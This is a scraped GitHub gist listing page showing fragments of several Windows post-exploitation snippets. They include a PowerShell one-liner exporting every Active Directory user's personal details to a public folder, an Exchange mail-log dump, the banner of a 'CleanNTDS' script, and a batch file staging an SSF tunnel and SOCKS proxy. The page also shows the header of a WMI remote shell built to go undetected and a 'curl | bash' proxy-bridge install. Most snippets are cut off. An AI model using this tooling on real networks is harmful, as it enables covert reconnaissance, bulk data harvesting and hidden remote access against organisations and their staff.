This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module ActiveDirectory | |
| Get-ADUser -Filter * -Properties * | Select -Property EmailAddress,GivenName,Surname,DisplayName,Title,Department,Office,OfficePhone,MobilePhone,Fax,StreetAddress,City,State,PostalCode,Country | Export-CSV "C:\\users\\public\\ADusers.csv" -NoTypeInformation -Encoding UTF8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-TransportService | Get-MessageTrackingLog -resultsize unlimited | export-csv -path c:\users\public\ExchangeLogs.csv | |
| Get-MessageTrackingLog -Server tlex1 ` -Start (Get-Date).AddDays(-1) ` -End (Get-Date) ` -EventId Send |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param ( | |
| [string]$ntds = "" | |
| ) | |
| write-host " CleanNTDSCleanNTDSCleanNTDS | |
| CleanNTDSCleanNTDS" -ForegroundColor green | |
| write-host " CleanNTDS | |
| CleanNTDS" -ForegroundColor Yellow | |
| write-host " CleanNTDSCleanNTDS | |
| CleanNTDSCleanNTDSCleanNTDS" -ForegroundColor green |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| SET ssfdserver=8.8.8.8 | |
| SET ssfport=443 | |
| SET ssfsoucksport=8008 | |
| SET dic=c:\programdata\Clouds | |
| SET server="http://server/ssf/" | |
| if not exist %dic% mkdir %dic% | |
| mkdir %dic% |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1)Config And Start: | |
| winrm quickconfig | |
| 2)Check: | |
| sc query winrm | |
| sc qc winrm | |
| netsh http show servicestate | |
| 3)Listener On: | |
| winrm get winrm/config |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Enter-WmiShell{ | |
| <# | |
| .SYNOPSIS | |
| Creates a limited* interactive prompt to interact with windows machines in a sneaky way, that is likely to go unnoticed/undetected. Use | |
| the command "exit" to close and cleanup the session; not doing so will leave data in the WMI namespaces. | |
| Author: Jesse Davis (@secabstraction) | |
| License: BSD 3-Clause | |
| Required Dependencies: Out-EncodedCommand, Get-WmiShellOutput |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REG QUERY "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -L https://raw.githubusercontent.com/snail007/proxy_admin_free/master/install_auto.sh | bash | |
| proxy-admin start | |
| proxy-admin stop | |
| proxy-admin restart | |
| Server: | |
| proxy bridge -t tcp -p :30000 |
ffcommax
/ Running .BAT or .CMD files hidden (invisible mode) Using Script
Created
July 27, 2019 18:12
Running .BAT or .CMD files hidden (invisible mode) Using Script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| smtp.office365.com | |
| 587 | |
OlderNewer